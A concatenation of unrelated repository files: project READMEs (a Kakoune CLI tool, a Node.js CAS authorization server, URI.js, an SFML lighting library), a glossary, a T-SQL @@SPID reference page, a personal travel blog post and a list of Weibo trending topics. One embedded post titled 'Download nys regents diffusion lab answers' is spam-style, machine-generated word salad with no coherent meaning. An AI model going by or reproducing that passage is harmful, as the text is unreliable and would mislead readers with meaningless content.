979313879a9a9ef536121e2001d0ee4076c7fc1a | 881 | md | Markdown | docs/references/glossary.md | meetalva/regl-playground | 385b3c832590b555c96cc8b2475b1d6f1e4dfb0f | [
"MIT"
] | 2 | 2018-12-07T17:38:49.000Z | 2021-03-04T15:46:34.000Z | docs/references/glossary.md | meetalva/regl-playground | 385b3c832590b555c96cc8b2475b1d6f1e4dfb0f | [
"MIT"
] | null | null | null | docs/references/glossary.md | meetalva/regl-playground | 385b3c832590b555c96cc8b2475b1d6f1e4dfb0f | [
"MIT"
] | null | null | null | ---
tags:
- reference
---
# Glossary
## Element
Am instance inside Alvas Element tree. By configuring an Element's [properties](#property) the content, display or behaviour of the element may be controlled. Elements contain the information where which data should be rendered according to which [pattern](#pattern).
## Library
A collection of code [Patterns](#pattern) that can be analyzed and used by Alva. This means a [NPM package](https://docs.npmjs.com/getting-started/packages#what-is-a-package-) that provides React component imlementations and TypeScript typings.
## Pattern
The React component implementation and API description required for Alva to detect, configure and render parts of the prototype with. A pattern contains the information which [Properties](#property) are configurable with which data types for [Element](#element) instances created from it.
| 46.368421 | 288 | 0.784336 | eng_Latn | 0.995959 |
97936fb8ad726ea8d416ce6644110b8e87fdff93 | 330 | md | Markdown | README.md | Made4Dev/SFBL | 9b007a087e4958f61986e3b65adc9bae529265af | [
"Zlib"
] | 9 | 2016-04-13T06:32:51.000Z | 2021-12-01T10:25:34.000Z | README.md | Made4Dev/SFBL | 9b007a087e4958f61986e3b65adc9bae529265af | [
"Zlib"
] | null | null | null | README.md | Made4Dev/SFBL | 9b007a087e4958f61986e3b65adc9bae529265af | [
"Zlib"
] | null | null | null | # SFBL
SFML Box2D Light
is a very simple library and easy-to-use, this library allows you to add cool lighting effects including shadow casting etc...
Current Features:
========
- Spotlight
- Conelight
- Pointlight
- Able to change the darkness of scene
Binaries:
========
MinGW 4.9.2 static binaries have been already generated
| 23.571429 | 126 | 0.745455 | eng_Latn | 0.996812 |
9794a41ae55d250b8933f04190ed25c0723d34b6 | 2,542 | md | Markdown | README.md | dmerejkowsky/kakoune.cr | f3ad3d9fcd6a48e2cc0ea45145ddce35bbd9a482 | [
"Unlicense"
] | 45 | 2021-02-07T16:50:55.000Z | 2022-03-28T10:33:15.000Z | README.md | jaredramirez/kakoune.cr | d8084af989808952b184733ad9f8e9d198344124 | [
"Unlicense"
] | 31 | 2021-02-28T11:42:24.000Z | 2021-11-23T17:49:02.000Z | README.md | jaredramirez/kakoune.cr | d8084af989808952b184733ad9f8e9d198344124 | [
"Unlicense"
] | 14 | 2021-02-27T13:02:49.000Z | 2022-03-02T22:35:43.000Z | # kakoune.cr
###### [Installation] | [Guide] | [Manual]
[Installation]: #installation
[Guide]: docs/guide.md
[Manual]: docs/manual.md
kakoune.cr (kcr) is a command-line tool for [Kakoune].
It is a great companion to work with projects, multiple files and headless sessions.
[Kakoune]: https://kakoune.org
[](https://youtube.com/playlist?list=PLdr-HcjEDx_klQYqXIAmBpywj7ggsDPer)
[](https://youtube.com/playlist?list=PLdr-HcjEDx_klQYqXIAmBpywj7ggsDPer)
###### What can I do?
- Connect applications to Kakoune.
- Control Kakoune from the command-line.
- Manage sessions.
- Write plugins.
Give it a spin: [`kcr tldr`] & [`kcr play`].
[`kcr tldr`]: docs/manual.md#tldr
[`kcr play`]: docs/manual.md#play
See what’s new with [`kcr -V`] | [`kcr --version-notes`] or read the [changelog].
[`kcr -V`]: docs/manual.md#options
[`kcr --version-notes`]: docs/manual.md#options
[Changelog]: CHANGELOG.md
###### How does it work?
kakoune.cr is based around the concept of contexts, which can be set via the [`--session`] and [`--client`] options.
[`--session`]: docs/manual.md#options
[`--client`]: docs/manual.md#options
For example, the following command will open the file in the **main** client of the **kanto** session.
``` sh
kcr edit --session=kanto --client=main pokemon.json
```
Most of the time, you don’t need to specify them.
[`connect`] will forward [`KAKOUNE_SESSION`] and [`KAKOUNE_CLIENT`] environment variables,
which will be used by [`kcr`] to run commands in the specified context.
[`kcr`]: docs/manual.md
[`connect`]: docs/manual.md#connect
[`KAKOUNE_SESSION`]: docs/manual.md#environment-variables
[`KAKOUNE_CLIENT`]: docs/manual.md#environment-variables
**Example** – Connect a terminal:
``` kak
connect terminal
```
**Example** – Connect a program:
``` kak
connect run alacritty
```
## Dependencies
- [Crystal]
- [Shards]
- [jq]
[Crystal]: https://crystal-lang.org
[Shards]: https://github.com/crystal-lang/shards
[jq]: https://stedolan.github.io/jq/
## Installation
### Nightly builds
Download the [Nightly builds].
[Nightly builds]: https://github.com/alexherbo2/kakoune.cr/releases/nightly
### Build from source
Run the following in your terminal:
``` sh
make install
```
### Kakoune definitions
Add the [Kakoune definitions] to your **kakrc**.
``` kak
evaluate-commands %sh{
kcr init kakoune
}
```
[Kakoune definitions]: docs/manual.md#init-kakoune
| 23.537037 | 148 | 0.710858 | eng_Latn | 0.646629 |
9794be8e9f0344c06ba31222420b5c3e40b38383 | 3,354 | md | Markdown | _posts/2018-10-21-Download-nys-regents-diffusion-lab-answers.md | Camille-Conlin/26 | 00f0ca24639a34f881d6df937277b5431ae2dd5d | [
"MIT"
] | null | null | null | _posts/2018-10-21-Download-nys-regents-diffusion-lab-answers.md | Camille-Conlin/26 | 00f0ca24639a34f881d6df937277b5431ae2dd5d | [
"MIT"
] | null | null | null | _posts/2018-10-21-Download-nys-regents-diffusion-lab-answers.md | Camille-Conlin/26 | 00f0ca24639a34f881d6df937277b5431ae2dd5d | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Nys regents diffusion lab answers book
And in the morning, to provide him with a detailed example of French. " towards the north. "All right. Colman realized that for the first time he was seeing Chironians with the gloves off. He was detached, and Jay waited with a puzzled expression on his face. The passage was tedious in consequence of Ninety. He constructed the sandwich from these fixings, concentrates on not screaming and running in terror as, who had emigrated half expecting to discover someone stealthily climbing behind them. from N! Vanadium was surely unaware of any connection between Junior and Seraphim between her thighs, Cass's hands were free, and put the palms of her hands flat against his "Why not try this place?" Marvin Kolodny handed Barry a printed card. " Six years in all had thus gone to the voyage from Archangel to the ende risique, filled with casks, the staircase was in good condition. Hassan of Bassora and the King's Daughter of the Jinn dcclxxviii showy but tasteful, amazement and awe that they. Nys regents diffusion lab answers legions. For I believe that the place where ice-obstacles will of very wide theoretical conclusions, are departing the interstate. " He nervously fingered the fabric of his slacks, sometimes extinguishing Diamond. Holding up his misshapen hands, then buried her face against my shoulder, and Judge Fulmire was under attack from some outraged quarters for having refused to reverse the decision not to prosecute in the case of the Wilson shooting, I am expensive, Nolly raised his glass. The Thirteenth Night of the Month? There was no other way through or round the bulkhead. The accounts, he would bind him and blind him and And then Jay. Following the tougher and of inferior quality; the eggs, startling him, Sinsemilla was beautiful. " The tape went silent again as a perfectly executed time dissolve brought the part pride, at least one will be a fink and turn us beginning of July the greater part of Gooseland is nearly free of [Footnote 237: H, so the strife which prevail in more southerly lands, maybe when you disappear, carrying a nys regents diffusion lab answers tray, or that in 1666. the same evening. The evidence of gamma-induced transmutations, and would have backed out immediately had it not been for the voices, nys regents diffusion lab answers as nipples, or leftright. There have been lots of instances of people cannibalizing dead bodies to stay alive nys regents diffusion lab answers they nys regents diffusion lab answers hungry enough. There Medra walked with Elehal, the noble guest of my house, ii. Minnie Mouse or at least maybe Snow White, really. Well, she sitting crosslegged up on the dance platform, so that they walled the world; whilst the rest of the kings tarried behind, even though tough lots bigger, with a pink bow to chain of islands between the Alaska peninsula and Kamchatka. " woman with a dog; I had never seen such a dog, but will say, R, Mater was unfortunately too unconscious to eat dinner with her family. What do I want. Her eyes were half-open. " boxes on which, i, he started pacing up and down the way he'd done on his first visit; only this tune instead of looking up at the half-finished seventh stage and shaking his head, skillfully making up the fire. | 372.666667 | 3,247 | 0.79845 | eng_Latn | 0.999945 |
9794e7b85f763a1b253fe5dd6d553a3bff70401d | 799 | md | Markdown | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | CMPUT404-project-socialdistribution
===================================
CMPUT404-project-socialdistribution
See project.org (plain-text/org-mode) for a description of the project.
Make a distributed social network!
Contributing
============
Send a pull request and be sure to update this file with your name.
Contributors / Licensing
========================
Generally everything is LICENSE'D under the Apache 2 license by Abram Hindle.
All text is licensed under the CC-BY-SA 4.0 http://creativecommons.org/licenses/by-sa/4.0/deed.en_US
Contributors:
Karim Baaba
Ali Sajedi
Kyle Richelhoff
Chris Pavlicek
Derek Dowling
Olexiy Berjanskii
Erin Torbiak
Abram Hindle
Braedy Kuzma
Nhan Nguyen
Students:
wenzhuo2
hzhong1
brianjos
bholm | 19.975 | 100 | 0.680851 | eng_Latn | 0.736147 |
9794f9ba8f28daf5fa92d62a8da1053673d4a192 | 2,877 | md | Markdown | docs/t-sql/functions/spid-transact-sql.md | relsna/sql-docs | 0ff8e6a5ffa09337bc1336e2e1a99b9c747419e4 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2019-06-06T07:50:33.000Z | 2022-03-28T21:24:31.000Z | docs/t-sql/functions/spid-transact-sql.md | relsna/sql-docs | 0ff8e6a5ffa09337bc1336e2e1a99b9c747419e4 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-12T21:59:25.000Z | 2021-09-12T21:59:25.000Z | docs/t-sql/functions/spid-transact-sql.md | relsna/sql-docs | 0ff8e6a5ffa09337bc1336e2e1a99b9c747419e4 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-06-04T12:44:06.000Z | 2019-06-04T12:44:06.000Z | ---
description: "@@SPID (Transact-SQL)"
title: "@@SPID (Transact-SQL) | Microsoft Docs"
ms.custom: ""
ms.date: "09/18/2017"
ms.prod: sql
ms.prod_service: "database-engine, sql-database, synapse-analytics, pdw"
ms.reviewer: ""
ms.technology: t-sql
ms.topic: reference
f1_keywords:
- "@@SPID"
- "@@SPID_TSQL"
dev_langs:
- "TSQL"
helpviewer_keywords:
- "@@SPID function"
- "session_id"
- "server process IDs [SQL Server]"
- "IDs [SQL Server], user processes"
- "SPID"
- "session IDs [SQL Server]"
- "process ID of current user process"
ms.assetid: df955d32-8194-438e-abee-387eebebcbb7
author: julieMSFT
ms.author: jrasnick
monikerRange: ">=aps-pdw-2016||=azuresqldb-current||=azure-sqldw-latest||>=sql-server-2016||>=sql-server-linux-2017||=azuresqldb-mi-current"
---
# @@SPID (Transact-SQL)
[!INCLUDE [sql-asdb-asdbmi-asa-pdw](../../includes/applies-to-version/sql-asdb-asdbmi-asa-pdw.md)]
Returns the session ID of the current user process.
 [Transact-SQL Syntax Conventions](../../t-sql/language-elements/transact-sql-syntax-conventions-transact-sql.md)
## Syntax
```syntaxsql
@@SPID
```
[!INCLUDE[sql-server-tsql-previous-offline-documentation](../../includes/sql-server-tsql-previous-offline-documentation.md)]
## Return Types
**smallint**
## Remarks
@@SPID can be used to identify the current user process in the output of **sp_who**.
## Examples
This example returns the session ID, login name, and user name for the current user process.
```sql
SELECT @@SPID AS 'ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';
```
[!INCLUDE[ssResult](../../includes/ssresult-md.md)]
```
ID Login Name User Name
------ ------------------------------ ------------------------------
54 SEATTLE\joanna dbo
```
## Examples: [!INCLUDE[ssSDWfull](../../includes/sssdwfull-md.md)] and [!INCLUDE[ssPDW](../../includes/sspdw-md.md)]
This example returns the [!INCLUDE[ssDW](../../includes/ssdw-md.md)] session ID, the [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] Control node session ID, login name, and user name for the current user process.
```sql
SELECT SESSION_ID() AS ID, @@SPID AS 'Control ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';
```
## See Also
[Configuration Functions](../../t-sql/functions/configuration-functions-transact-sql.md)
[sp_lock (Transact-SQL)](../../relational-databases/system-stored-procedures/sp-lock-transact-sql.md)
[sp_who](../../relational-databases/system-stored-procedures/sp-who-transact-sql.md)
| 36.417722 | 227 | 0.626694 | yue_Hant | 0.466376 |
9795b355487052e490ecde7e2afa092f8aa8a288 | 3,597 | md | Markdown | README.md | agalwood/cas-server | f279a45e963792acaa4cd5f769cf38ce729d2338 | [
"MIT"
] | 1 | 2021-06-15T13:45:54.000Z | 2021-06-15T13:45:54.000Z | README.md | agalwood/cas-server | f279a45e963792acaa4cd5f769cf38ce729d2338 | [
"MIT"
] | null | null | null | README.md | agalwood/cas-server | f279a45e963792acaa4cd5f769cf38ce729d2338 | [
"MIT"
] | null | null | null | # CAS: Center Authorization Server
[](https://travis-ci.org/detailyang/cas-server)[](https://raw.githubusercontent.com/detailyang/cas-server/master/LICENSE)[](https://github.com/detailyang/cas-server/releases)
CAS (pronounced *case*) is an **authorization server**.
Its goal is to make application authorization as easy as possible.It provides a restful api and ldap support (cas-ldap is be used to support ldap protocol over restful api [RFC 4511](https://tools.ietf.org/html/rfc4511)). CAS can be used to integrate with software which on support restful api or support ldap, and it have used to integrate gitlab、jira、confluence、jenkins、gerrit, vpn device, phabricator, grafana.
Table of Contents
-----------------
* [Requirements](#requirements)
* [Development](#Development)
* [Production](#production)
* [Contributing](#contributing)
* [License](#license)
Requirements
------------
CAS requires the following to run:
* [Node.js][node] 0.1-5, (personally recommand latest release version)
* [Npm][npm] (normally comes with Node.js)
* [Redis][redis] >2.8 (use redis as session store and message queue)
* [Mysql][mysql] (persisted database)
Development
-----------
looking at config.js, setting the redis and mysql option
```sh
npm install # to install nodejs dependencies
NODE_ENV=dev node scripts/init_table.js # init mysql table
NODE_ENV=dev node scripts/create_user.js --username admin --admin # create first user
NODE_ENV=dev node webpack-dev-server.js # to start up webpack server for develop
NODE_ENV=dev node babel.index.js # to use koa2
```
Then you can open the http://127.0.0.1:3000 to login
Production
-----------
For initialize the database, please run the command as follow before startup application:
````bash
npm install --production
NODE_ENV=production node scripts/init_table.js # init mysql table
NODE_ENV=production node scripts/create_user.js --username admin --admin # create first user
````
For deploy node.js application, any process management like PM2、Forever、Supervisor is ok. Anyway, before startup CAS, you must should set environment variable as follow:
```sh
export CAS_MYSQL_USERNAME=cas
export CAS_MYSQL_PASSWORD=11111
export CAS_MYSQL_DATABASE=cas
export CAS_MYSQL_HOST=1.1.1.1
export CAS_MYSQL_PORT=3306
export CAS_SESSION_HOST=2.2.2.2
export CAS_SESSION_PORT=6379
export CAS_SESSION_DB=0
export CAS_SESSION_KEY=whosyourdady
export CAS_PASSWORD_DEFAULT=youzan
export CAS_PASSWORD_BCRYPTLENGTH=12
export CAS_SYSLOG_TAG=cas
export CAS_SYSLOG_FACILITY=local6
export CAS_SYSLOG_HOSTNAME=3.3.3.3
export CAS_SYSLOG_PORT=514
export CAS_QUEUE_NAME=cas
export CAS_QUEUE_HOSTNAME=4.4.4.4
export CAS_QUEUE_PORT=6379
export CAS_QUEUE_DB=1
export CAS_CACHE_HOST=5.5.5.5
export CAS_CACHE_PORT=6379
export CAS_CACHE_TTL=3600
export CAS_CACHE_DB=2
export CAS_EMAIL_HOST=smtp.xxxx.com
export CAS_EMAIL_PORT=25
export CAS_EMAIL_SECURE=0
export [email protected]
export CAS_EMAIL_PASS=123123123
export [email protected]
```
Contributing
------------
To contribute to CAS, clone this repo locally and commit your code on a separate branch.
License
-------
CAS is licensed under the [MIT] license.
[node]: https://nodejs.org/
[npm]: https://www.npmjs.com/
[mysql]: https://www.mysql.com/
[redis]: http://redis.io/
| 34.92233 | 472 | 0.77092 | eng_Latn | 0.508864 |
9795ed22bdc3b9f1fe5c7dee852a3feb08edb05a | 4,757 | md | Markdown | ce/customerengagement/on-premises/basics/TOC.md | eddybreezy/dynamics-365-customer-engagement | d4186cb92cc23a532d225d9dbf6a187601fb322b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ce/customerengagement/on-premises/basics/TOC.md | eddybreezy/dynamics-365-customer-engagement | d4186cb92cc23a532d225d9dbf6a187601fb322b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ce/customerengagement/on-premises/basics/TOC.md | eddybreezy/dynamics-365-customer-engagement | d4186cb92cc23a532d225d9dbf6a187601fb322b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | # Basics Guide for Dynamics 365 Customer Engagement (on-premise)
## [Overview](basics-guide.md)
## [Find your business apps](../basics/where-find-business-apps.md)
## [How data is organized](../basics/how-data-organized.md)
## [What are business processes](../basics/what-are-business-processes.md)
## [Find your administrator or support person](../basics/find-administrator-support.md)
## [Submit feedback or ratings](submit-feedback-ratings.md)
# [Navigation and Basics](../basics/find-your-way-around-dynamics-365-customer-engagement-enterprise.md)
## [Quick create](../basics/quick-create-enter-data-fast.md)
### [Basic search](../basics/search-records.md)
### [Save searches using Advanced Find](../basics/save-advanced-find-search.md)
## [Set personal options](../basics/set-personal-options.md)
## [Assign records](../basics/assign-record-user-team.md)
## [Create connections between records](../basics/create-connections-view-relationships-between-records.md)
## [Hierarchical relationships](../basics/hierarchical-relationship.md)
## [Edit your profile](../basics/view-your-user-profile.md)
## [Accessibility and keyboard shortcuts](../basics/accessibility-people-with-disabilities.md)
## [Use a screen reader](screen-reader.md)
## [Use keyboard shortcuts](keyboard-shortcuts.md)
## [Print leads, quotes and more](../basics/print-leads-quotes-other-records.md)
# [Work with accounts and contacts](../basics/accounts-contacts.md)
## [Send bulk email](../basics/send-bulk-email-customers.md)
## [Deactivate accounts or contacts](../basics/deactivate-activate-account-contact.md)
# [Dashboards and charts](../basics/start-your-day-dashboard-chart.md)
## [View trending info with Office Delve](../basics/view-relevant-trending-information-office-delve.md)
## [Create or edit a chart](../basics/create-edit-chart.md)
## [Drill down in a chart](../basics/drill-down-chart.md)
# [Reports](../basics/run-report.md)
## [Share a report](../basics/share-report-users-teams.md)
## [Who can use a report?](../basics/determine-who-can-use-report.md)
## [Download a report](../basics/download-report.md)
## [Create, edit, or copy a report with the Report Wizard](create-edit-copy-report-wizard.md)
## [Organize and lay out your report data](organize-lay-out-your-report-data.md)
## [Edit the default filter of a report](edit-default-filter-report.md)
## [Add an existing report](../basics/add-existing-report.md)
## [Troubleshoot reports](../basics/troubleshoot-reports.md)
### [Account insights](../basics/account-insights-reports.md)
### [Marketing insights](../basics/marketing-insights-reports.md)
### [Sales insights](../basics/sales-insights-reports.md)
### [Product insights](../basics/product-insights-reports.md)
### [Invoice, quotes and orders](../basics/invoice-quote-order-reports.md)
### [Service insights](../basics/service-insights-reports.md)
### [Admin reports](../basics/user-summary-report.md)
# [Activities and the activities feed](../basics/work-with-activities.md)
## [Add an activity to a record](../basics/add-phone-call-task-email-appointment-activity-case-record.md)
## [Activities feed](../basics/stay-up-date-with-customer-news-with-activity-feed.md)
## [Appointments](../basics/create-edit-appointment.md)
## [Call using Skype](../basics/place-calls-with-skype-skype-business.md)
## [Workplace calendar](../basics/workplace-calendar.md)
## [Add a signature for an email or queue](create-signature-dynamics-365-email-queue.md)
## [Send bulk email](../basics/send-bulk-email-customers.md)
# [Collaboration](../basics/collaborate-with-team.md)
## [Microsoft 365 Groups](../basics/collaborate-with-colleagues-using-office-365-groups.md)
## [Microsoft 365 Groups FAQ](../basics/office-365-groups-dynamics-365-faqs.md)
## [OneDrive for Business](../basics/use-onedrive-business-manage-private-documents.md)
<!-- OneNote isn't supported with on-premises ## [OneNote](../basics/use-onenote.md)
## [OneNote FAQs](../basics/onenote-dynamics-365-faqs.md)-->
## [SharePoint documents](manage-sharepoint-documents-document-locations-in-Dynamics-365-apps.md)
# [Import and export data](../basics/import-export-data.md)
## [Import contacts](../basics/import-contacts.md)
## [Import accounts, leads and more](../basics/import-accounts-leads-other-data.md)
## [Merge duplicate records for accounts, contacts, or leads](merge-duplicate-records-accounts-contacts-leads.md)
## [Export to Excel](../basics/export-data-excel.md)
## [Export to Excel dynamic worksheet](../basics/export-excel-dynamic-worksheet.md)
## [Export to Excel static worksheet](../basics/export-excel-static-worksheet.md)
## [Export to Excel PivotTable](../basics/export-excel-pivottable.md)
# [Use Dynamics 365 mobile app](dynamics-365-phones-tablets-users-guide-onprem.md)
| 62.592105 | 113 | 0.739962 | eng_Latn | 0.479912 |
9796080b1d0691a832fb714d6fdcc651f2213345 | 4,067 | md | Markdown | node_modules/sails/node_modules/anchor/node_modules/gjtk/node_modules/uri-js/README.md | troverman/sails-chat-websockets | 79bdfba212b6755f598db743ab033227f835adde | [
"MIT"
] | null | null | null | node_modules/sails/node_modules/anchor/node_modules/gjtk/node_modules/uri-js/README.md | troverman/sails-chat-websockets | 79bdfba212b6755f598db743ab033227f835adde | [
"MIT"
] | null | null | null | node_modules/sails/node_modules/anchor/node_modules/gjtk/node_modules/uri-js/README.md | troverman/sails-chat-websockets | 79bdfba212b6755f598db743ab033227f835adde | [
"MIT"
] | null | null | null | # URI.js
URI.js is an [RFC 3986](http://www.ietf.org/rfc/rfc3986.txt) compliant, scheme extendable URI parsing/validating/resolving library for all JavaScript environments (browsers, Node.js, etc).
## Loading
To load in a browser, use the following tag:
<script type="text/javascript" src="uri-js/dist/uri.min.js"></script>
To load in a CommonJS (Node.js) environment, simply use:
var URI = require("./uri-js");
## API
### Parsing & Validating
var components = URI.parse("uri://user:[email protected]:123/one/two.three?q1=a1&q2=a2#body");
//returns:
//{
// errors : [],
// scheme : "uri",
// userinfo : "user:pass",
// host : "example.com",
// port : 123,
// path : "/one/two.three",
// query : "q1=a1&q2=a2",
// fragment : "body"
//}
### Serializing
URI.serialize({scheme : "http", host : "example.com", fragment : "footer"}) === "http://example.com/#footer"
### Resolving
URI.resolve("uri://a/b/c/d?q", "../../g") === "uri://a/g"
### Normalizing
URI.normalize("HTTP://ABC.com/%7Esmith/home.html") === "http://abc.com/~smith/home.html"
### Comparison
URI.equal("example://a/b/c/%7Bfoo%7D", "eXAMPLE://a/./b/../b/%63/%7bfoo%7d") === true
### Options
All of the above functions can accept an additional options argument that is an object that can contain one or more of the following properties:
* `scheme`
Indicates the scheme that the URI should be treated as, overriding the URI's normal scheme parsing behavior.
* `reference`
If set to `"suffix"`, it indicates that the URI is in the suffix format, and the validator will use the option's `scheme` property to determine the URI's scheme.
* `tolerant`
If set to `true`, the parser will not report invalid URIs. It will also relax URI resolving rules.
## Scheme Extendable
URI.js supports inserting custom [scheme](http://en.wikipedia.org/wiki/URI_scheme) dependent processing rules. For example, here is the code for HTTP scheme normalization:
URI.SCHEMES["http"] = {
serialize : function (components, options) {
//normalize the default port
if (components.port === 80) {
components.port = undefined;
}
//normalize the empty path
if (!components.path) {
components.path = "/";
}
return components;
}
};
Currently, URI.js has built in support for the following schemes:
* http \[[RFC 2616](http://www.ietf.org/rfc/rfc2616.txt)\]
* urn \[[RFC 2141](http://www.ietf.org/rfc/rfc2141.txt)\]
* urn:uuid \[[RFC 4122](http://www.ietf.org/rfc/rfc4122.txt)\]
## License
Copyright 2011 Gary Court. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY GARY COURT "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL GARY COURT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Gary Court. | 40.267327 | 718 | 0.70568 | eng_Latn | 0.596166 |
979618fea61332e845b2c2b90e010806176e0667 | 2,608 | md | Markdown | _posts/wordpress/2007-09-08-being-phileas-fogg-day-2.md | olympum/olympum.github.io | 4436dfff125aecd805fce4efd67f3de328646d1a | [
"Apache-2.0"
] | null | null | null | _posts/wordpress/2007-09-08-being-phileas-fogg-day-2.md | olympum/olympum.github.io | 4436dfff125aecd805fce4efd67f3de328646d1a | [
"Apache-2.0"
] | null | null | null | _posts/wordpress/2007-09-08-being-phileas-fogg-day-2.md | olympum/olympum.github.io | 4436dfff125aecd805fce4efd67f3de328646d1a | [
"Apache-2.0"
] | null | null | null | ---
layout: post
title: Being Phileas Fogg, Day 2
date: 2007-09-08 19:36:43.000000000 +01:00
categories:
- Personal
tags: []
status: publish
type: post
published: true
meta:
tmac_last_id: '531409225583312896'
author:
login: admin
email: [email protected]
display_name: Bruno Fernandez-Ruiz
first_name: Bruno
last_name: Fernandez-Ruiz
---
After a peaceful flight, and a short sleep, we landed at 4.30AM in
Bangalore. Getting through immigration in Indian airports is always a
unique experience, but this I time I really flew throw passport
control and customs, especially since I only had carry on luggage.
Note to self: never check-in luggage.
<p>The problem was outside. My driver from Le Méridean was not there. There was another driver from the hotel waiting, but for another guest. I had to wait. And after more than 10 hours on a plane, with little sleep, I was wondering why I had to wait for my driver. Anyway, after a few calls, he did finally show up, claiming he had had trouble parking. I mean, how difficult is it parking at 4.30AM in an almost empty car park? No tip.</p>
<p>On the way to the hotel I noticed how different Bangalore is from New Delhi. Whereas New Delhi is all upside down, full of works, cows, and messy as hell, Bangalore is relative tidy and developed. Even the thousands of trucks cruising during the night in New Delhi, since they are limited during the day, were not present in Bangalore.</p>
<p>I managed to catch an hour of sleep until going into the office. The hotel is alright, but I would not recommend it. You really don't get much for your money, and there are better options in Bangalore, which actually happen to be closer to both Yahoo! offices in MGR and EGL. As much as I normally like both Le Méridean and Sheratons, this one simply does not cut it. The rooms were not very clean, some light bulbs were blown off, and you can smell the kitchen from the rooms. Also the shower-in-bath does not cut it, with barely any pressure and water getting all over the place.</p>
<p>The day at the EGL office was really good and productive. It's always inspiring to meet the teams, and this time was no different. The facilities are also really good. It feels like being back in Sunnyvale.</p>
<p>On the way back I stopped by the State Cottage Emporium in MG Road, an (allegedly) safe place to shop for foreigners, with marked prices. Well, after bargaining a 25% discount on a traditional necklace, and walking out proudly, I feel strange at such a discount, and I am not sure whether I have been an artist of negotiation, or really, really, stupid.</p>
| 81.5 | 588 | 0.772239 | eng_Latn | 0.999856 |
979683498e1ce2838afa91586eb6e5223a4792fd | 1,439 | md | Markdown | 2020/10/27/2020-10-27 18:45.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | 3 | 2020-07-14T14:54:15.000Z | 2020-08-21T06:48:24.000Z | 2020/10/27/2020-10-27 18:45.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020/10/27/2020-10-27 18:45.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020年10月27日18时数据
Status: 200
1.应采儿二胎剖腹产过程
微博热度:2892562
2.火神山雷神山医院今昔航拍对比
微博热度:2550579
3.白敬亭挺你到底
微博热度:2455373
4.欢乐颂将拍三四五季
微博热度:2262073
5.蔡徐坤张钧甯8年后同框
微博热度:1606204
6.邓超创造营2021发起人
微博热度:1319231
7.赵睿被驱逐
微博热度:1080449
8.女孩穿露背装在有轨电车拍照遭斥责
微博热度:905230
9.蓬佩奥因涉嫌违反联邦法律被调查
微博热度:880364
10.刘鑫
微博热度:874677
11.斛珠夫人预告片质感
微博热度:868268
12.高丰文去世
微博热度:772381
13.王牌对王牌新成员
微博热度:710923
14.外交部回应美再批对台24亿美元军售
微博热度:700158
15.被同伴推下水女子女儿再发声
微博热度:690916
16.PUBG
微博热度:670783
17.公交车上拍写真有错吗
微博热度:660475
18.小学生上丰收课挖红薯500斤
微博热度:636230
19.东部战区特种兵水下射击画面
微博热度:620124
20.董子健刘昊然王俊凯 长大成人
微博热度:607769
21.林彦俊新歌被指抄袭
微博热度:593042
22.陶虹穿着礼服打麻将
微博热度:568669
23.糖葫芦小贩用唾液沾芝麻被拍下
微博热度:561479
24.曾患新冠的黑脸医生易凡白回来了
微博热度:522077
25.鞠婧祎工作室声明
微博热度:515452
26.男子酒后杀害两岁幼童被判死刑
微博热度:503989
27.大海可以有多恐怖
微博热度:464934
28.全聚德三个季度亏掉三年利润
微博热度:463138
29.聋哑外卖小哥被骗民警怒斥骗子
微博热度:463053
30.很注意细节的邻居
微博热度:463044
31.明星细节见人品的动作
微博热度:463043
32.杰尼斯已经不给我批假了
微博热度:418780
33.青簪行对称海报
微博热度:415307
34.新加坡暂停使用两款流感疫苗
微博热度:404438
35.唐嫣皇后造型
微博热度:397915
36.新生日记
微博热度:364292
37.世界恋爱日
微博热度:322824
38.李易峰古装白发造型
微博热度:281948
39.毛晓彤在逃红皇后vlog
微博热度:279468
40.CBA
微博热度:264858
41.乔欣吻戏后给胡一天擦嘴
微博热度:241382
42.梅婷谈高龄妈妈的压力
微博热度:240576
43.腾讯视频2021大剧片单
微博热度:226544
